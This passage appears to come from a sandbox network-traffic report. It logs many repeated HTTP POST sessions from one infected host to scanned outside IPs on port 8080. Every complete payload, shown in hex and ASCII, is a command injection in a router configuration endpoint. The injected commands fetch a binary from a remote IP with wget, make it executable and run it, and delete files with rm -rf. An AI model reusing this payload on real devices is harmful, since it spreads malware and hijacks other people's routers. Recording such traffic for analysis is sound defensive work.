                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2980192.168.2.2359814177.7.23.1718080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501787901 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2981192.168.2.2346956118.130.133.1528080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501805067 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2982192.168.2.234502497.142.191.148080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501868963 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2983192.168.2.2353220128.71.238.1968080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501890898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2984192.168.2.2358542148.69.204.1548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501890898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2985192.168.2.2336294194.112.40.1288080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501919031 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2986192.168.2.235575084.53.221.1038080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501928091 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2987192.168.2.2345330188.0.52.1898080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501945972 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2988192.168.2.2348902172.115.89.1198080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.501957893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2989192.168.2.2342882140.145.76.798080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502468109 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2990192.168.2.235050461.81.191.658080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502502918 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2991192.168.2.2346300167.3.51.1688080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502527952 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2992192.168.2.235497057.3.199.138080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502541065 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2993192.168.2.235310278.0.21.1988080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502613068 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;
                                                        May 28, 2024 08:59:16.747793913 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2994192.168.2.233976284.169.163.1278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502669096 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2995192.168.2.233308075.159.60.2238080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502698898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2996192.168.2.2359800180.148.191.1278080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502698898 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2997192.168.2.234688423.6.69.2108080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502729893 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2998192.168.2.2347086112.227.47.538080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502732038 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        2999192.168.2.235403485.100.252.208080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502765894 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3000192.168.2.234527678.0.23.548080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502821922 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
                                                        Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 31 37 37 2e 33 35 2e 33 32 2f 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 20 2e 2f 74 61 6a 6d 61 2e 6d 70 73 6c 20 74 61 6a 6d 61 2e 6d 70 73 6c 3b 72 6d 20 2d 72 66 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                        Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf *mpsl*;wget http://103.177.35.32/tajma.mpsl; chmod 777 tajma.mpsl; ./tajma.mpsl tajma.mpsl;rm -rf *mpsl*;


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        3001192.168.2.2359604203.151.135.1568080
                                                        TimestampBytes transferredDirectionData
                                                        May 28, 2024 08:59:16.502866030 CEST234OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                        Cookie: user=admin
